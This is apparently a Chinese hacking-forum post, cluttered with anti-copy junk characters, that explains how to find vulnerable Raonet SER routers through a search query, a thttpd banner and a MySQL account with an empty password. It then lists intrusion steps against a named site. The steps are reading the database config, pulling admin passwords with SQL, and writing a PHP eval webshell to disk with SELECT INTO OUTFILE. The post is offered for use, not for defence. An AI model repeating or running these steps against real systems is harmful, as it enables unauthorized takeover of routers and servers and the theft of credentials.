寻找存在漏洞的路由器方法: k, u( {# C r. H% `/ ?
0 Z) r G7 X- L1 D3 Y
1:google搜索'Raonet Subscriber Ethernet Router'6 ]1 o! A3 T$ F( M" U) d, U5 K" W
8 G+ g6 n, ~7 U$ L; k. o+ \
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr20019 T* x: U9 b' A. h* e# j3 }# `* Y
, U0 {4 z4 f3 Z$ L3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
9 z' k) B5 s% J8 c \
, ?* B, @6 W8 { G& C//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......4 u5 M) ^5 a' O) o& {$ u
m# `4 v h7 t6 w' Z! s, j# W7 b : A, x+ o1 F" N& c% Z) B
. X7 x/ F/ Q i3 D入侵步骤:
- _) R7 k& T4 j+ d% W& T+ u; s" {2 _" y- v% T# L1 g
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
[8 c- {( m0 v% G" V% R9 @& h# y, m5 G' o$ [' a' w
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
: P$ J; \8 Y( o- w3:得到密码后连接,查看GUI管理密码:
& J& X5 @ M4 f- X! iuse ser_5008 R: i6 L) v. E5 t+ C$ O2 B. x
select id,passwd from user;" g9 I$ H$ P2 o* \0 C( m: V
4:通过数据库写入webshell,执行命令:0 V0 y* e7 L3 \1 K3 T% B; A6 t
use mysql;
! l( e' \& v& n; ncreate table ok(cmd TEXT);
# G0 n8 z* T! y0 c; F7 [! C* _insert into ok values("<?php @eval($_POST[cmd])?>");. q, A: e0 J' l6 L" C
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
; u' z& {8 x2 e' [4 O/ pdrop table ok;
- q, |, [! b$ S! N' h2 l' I+ E, a* j8 h: N
5:连接后门shell.php $ }0 K4 r2 c# d+ ^
~! G9 |3 T8 B+ v8 M' w: r/ A" X; X
6. 搞定!8 ^$ u& P. C3 o$ L. B4 R
8 m! a' l0 r9 Q5 f$ { |